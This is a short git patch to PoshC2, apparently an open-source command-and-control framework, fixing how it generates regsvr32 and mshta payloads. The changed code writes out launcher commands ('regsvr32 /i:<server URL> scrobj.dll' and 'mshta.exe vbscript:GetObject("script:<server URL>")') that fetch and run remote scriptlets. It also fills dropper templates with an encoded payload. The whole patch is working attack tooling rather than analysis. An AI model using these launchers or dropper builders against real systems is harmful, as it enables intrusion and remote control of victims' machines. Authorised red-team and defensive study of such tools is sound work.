From eabe93641df7e9a49fcdefa06726c34639d17c98 Mon Sep 17 00:00:00 2001
From: benpturner <2518196+benpturner@users.noreply.github.com>
Date: Wed, 16 Sep 2020 16:41:21 +0100
Subject: [PATCH] Fix mshta & regsvr32 payloads

---
 poshc2/server/payloads/Payloads.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/poshc2/server/payloads/Payloads.py b/poshc2/server/payloads/Payloads.py
index 262517f8..0f6c017f 100644
--- a/poshc2/server/payloads/Payloads.py
+++ b/poshc2/server/payloads/Payloads.py
@@ -294,7 +294,7 @@ def CreateShellcode(self, name=""):
     def CreateSCT(self, name=""):
         self.QuickstartLog(Colours.END)
         self.QuickstartLog("regsvr32 /s /n /u /i:%s scrobj.dll" % f"{self.FirstURL}/{self.QuickCommand}_rg")
-        with open("%s%sdropper_cs.sct" % (PayloadTemplatesDirectory, name), 'r') as f:
+        with open("%s%sdropper_rg.sct" % (PayloadTemplatesDirectory, name), 'r') as f:
             content = f.read()
         content = str(content) \
             .replace("#REPLACEME#", self.CreateRawBase())
@@ -302,7 +302,7 @@ def CreateSCT(self, name=""):
             f.write(content)
 
         self.QuickstartLog(Colours.END)
-        self.QuickstartLog("mshta.exe vbscript:GetObject(\"script:%s\")(window.close)" % f"{self.FirstURL}/{self.QuickCommand}_cs")
+        self.QuickstartLog("mshta.exe 'vbscript:GetObject(\"script:%s\")(window.close)'" % f"{self.FirstURL}/{self.QuickCommand}_cs")
         with open("%s%sdropper_cs.sct" % (PayloadTemplatesDirectory, name), 'r') as f:
             content = f.read()
         content = str(content) \